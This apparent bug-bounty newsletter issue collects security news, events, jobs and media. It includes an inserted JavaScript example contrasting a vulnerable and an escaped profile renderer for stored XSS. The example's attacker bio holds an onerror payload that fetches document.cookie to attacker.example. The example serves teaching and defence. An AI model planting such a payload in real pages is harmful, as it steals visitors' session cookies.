
🐝 Hive Five 67 – The more you know

Hi friends,

Greetings from the hive!

I hope you had a great weekend. It's getting significantly warmer over here, so it's time to stash the winter clothes.

I finished watching the show Severance on Apple TV. Amazing! Check it out if you haven't already.

My question for you is, do you have a 30-for-30 plan? Let me know if you do!

Let's take this week by swarm!

🐝 The Bee's Knees

  1. Palisade identifies Wormable Cross-Site Scripting Vulnerability affecting Rarible’s NFT Marketplace: On April 14th, Palisade reported a cross-site scripting vulnerability and WAF bypass affecting the “rarible.com” domain. An attacker could inject arbitrary HTML and JavaScript on their profile page which persisted by “following the user around” as they navigated the website.

  2. OffensiveCon22 - Mark Dowd - Keynote - How Do You Actually Find Bugs?: Mark Dowd is an expert in application security, specializing primarily in low-level operating system flaws for desktop and mobile platforms.

  3. Introduction to Z-winK University: The Z-winK University is back! The goal is to teach how to be successful in bug bounty with tons of bug bounty tips.

  4. Psychic Signatures in Java: The long-running BBC sci-fi show Doctor Who has a recurring plot device where the Doctor manages to get out of trouble by showing an identity card which is actually completely blank.

  5. The More You Know, The More You Know You Don’t Know: This is the authors' third annual year-in-review of 0-days exploited in the wild. Each year they look back at all of the detected and disclosed in-the-wild 0-days as a group and synthesize what they think the trends and takeaways are.
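The bug class in item 1 (attacker-supplied profile HTML rendered to every visitor), as an added example that is not Rarible's or Palisade's code: a profile renderer that interpolates an attacker-controlled bio into markup unescaped, beside a hardened version that encodes the HTML-significant characters first. The profile fields, the `escapeHtml` helper and the `containsRawTag` check are assumptions made for illustration.

```javascript
// Added example (not Rarible's or Palisade's code): stored XSS in a profile
// renderer, the vulnerable form beside a hardened one.
// The profile record and its field names are constructed for illustration.

// Constructed attacker-controlled profile, as a stored record would hold it.
const attackerProfile = {
  username: 'mallory',
  bio: '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">',
};

// Vulnerable: untrusted fields are concatenated straight into markup, so any
// HTML/JS in the bio is served to every visitor who views the profile page.
function renderProfileUnsafe(profile) {
  return `<div class="profile"><h1>${profile.username}</h1><p>${profile.bio}</p></div>`;
}

// Hardened: encode the five HTML-significant characters before interpolation
// into an HTML text context (attribute, URL and script contexts need their
// own encoders; this helper is not sufficient there).
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

function renderProfileSafe(profile) {
  return `<div class="profile"><h1>${escapeHtml(profile.username)}</h1><p>${escapeHtml(profile.bio)}</p></div>`;
}

// Crude check used only to show the difference between the two renderers:
// does the output contain a raw tag other than the template's own div/h1/p?
function containsRawTag(html) {
  return /<(?!\/?(div|h1|p)\b)[a-z]/i.test(html);
}

console.log(renderProfileUnsafe(attackerProfile)); // <img ...onerror=...> reaches the browser
console.log(renderProfileSafe(attackerProfile));   // &lt;img ... is rendered as text
```

Output encoding at the point of rendering is the fix; the WAF bypass reported alongside the Rarible finding is a reminder that request filtering in front of the application is not a substitute for it.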

🙏🏻 Support the Hive

🔥 Buzzworthy

✅ Changelog

  1. gau v2.1.1 - speed improvement: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.

📅 Events

  1. Bugcrowd's 8th LevelUp will be held on May 21st: Our goal with LevelUp is to provide education, exposure, and uplift across the global security community for researchers of all experience levels.

  2. hardwear.io Security Trainings and Conference USA 2022 - 6th - 10th June 2022.

  3. NahamCon 2022 speakers - April 30th: Excited to announce this year's NahamCon2022 speakers: @Jhaddix @zseano @infosec_au @samwcyo @codingo_ @InsecureNature @farah_hawaa @hakluke @areyou1or0 @seanyeoh & @devec0 @adrianhetman @gregxsunday Hosted by @stokfredrik & @_JohnHammond.

  4. Tool Talks - Deep Dive Technical Webcast on ripgen Tool - May 11th: As attack surfaces continue to expand at an immeasurable rate, so do subdomain takeovers.

  5. Diving Deeper into Subdomain Takeovers & Mitigations with Shubham Shah - April 29th: They’ll be diving into different types of infrastructure takeovers, with a focus on subdomain takeovers, and how they can be leveraged by attackers and bounty hunters to create real security impact.

🎉 Celebrate

💰 Career Corner

  1. Synack Red Team is looking for threat modelers.

  2. Gillis on saving your cash: "I wanted to take a second to tell the younger folks who may be flush with cash for the first time something: SAVE YOUR CA$H. [...]"

  3. Daniel on how to treat your ideas: "Forget about founding a startup. Instead become a VC for your own ideas. [...]"

  4. Canva is hiring for a variety of technical roles: Including Penetration Testing / Red Team.

  5. Ubisoft's Bug Bounty program is hiring a Technical Program Manager.

⚡️ From the Community

📰 Articles & Threads

  1. Why using URL shorteners to share sensitive URLs is a terrible idea: A great thread on the security considerations when using URL shorteners.

  2. Security issues with cloudflare/odoh-server-go and the ODoH RFC draft #30: Frans has been researching ODoH (Oblivious DNS over HTTPS) and has identified some issues with the running cloudflare/odoh-server-go project, as well as some issues with the RFC draft itself, which lacks important security considerations.

  3. AWAE Course and OSWE Exam Review: This is a review of the Advanced Web Attacks and Exploitation (WEB-300) course and its OSWE exam by Offensive-Security.

  4. What VPS to choose?: There are tons of cloud providers that offer different types of servers with a lot of different options.

  5. Meet the Blockchain Detectives Who Track Crypto’s Hackers and Scammers.

📚 Resources

🎥 Videos

  1. It's been a year since GitHub education's Security Shorts aired: Make sure to check it out if you haven't already.

  2. Sunday Live Recon w/ IppSec: Check out this episode of Live Recon! Hosted by @Jhaddix, @nahamsec and @stokfredrik.

  3. ManoMano’s Red Team Operation - From a Click to an RCE by 0xLupin: In this presentation Roni Carta, alias Lupin, will share how it was possible to gain access to one of ManoMano’s servers by finding and exploiting a vulnerability during a Red Team Operation.

  4. IppSec takes on HackTheBox - Backdoor.

  5. The Pivot - Kicks & Chips - Deep Dive into Scalper Bots: Scalper bots are designed to automatically buy a large amount of an exclusive item such as tickets, sneakers, or GPUs, often to resell them for profit.

🎵 Audio

  1. Another iOS Bug and Edge Chakra Exploitation [Binary Exploitation Podcast]: A massive 11,000-byte overflow in WatchGuard, some discussion about lock-related vulnerabilities and analysis, and a look at a ChakraCore exploit dealing with all the mitigations (ASLR, DEP, CFG, ACG, CIG).

  2. The Privacy, Security, & OSINT Show #258 - Introducing UNREDACTED Magazine: This week they announce their new privacy-themed magazine and present a warning about using Telnyx.

  3. Smashing Security #271 - Crypto break-in, Google blurring, and mics not muting: NetFoundry's OpenZiti is an open source, free and easy way for the world to embed zero trust networking into anything.

  4. Darknet Diaries #115 - Player Cheater Developer Spy: Some video game players buy cheats to win. Let’s take a look at this game cheating industry to see who the players are. Support for this show comes from Axonius. Securing assets — whether managed, unmanaged, ephemeral, or in the cloud — is a tricky task.

  5. Malicious Life - Aaron Swartz: When 24-year-old Aaron Swartz was caught scraping millions of science articles off of JSTOR, he faced up to 35 years in prison plus a fine of up to 1 million dollars. Did Aaron’s crime justify such a harsh punishment?

Get $100 to try DigitalOcean - The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.
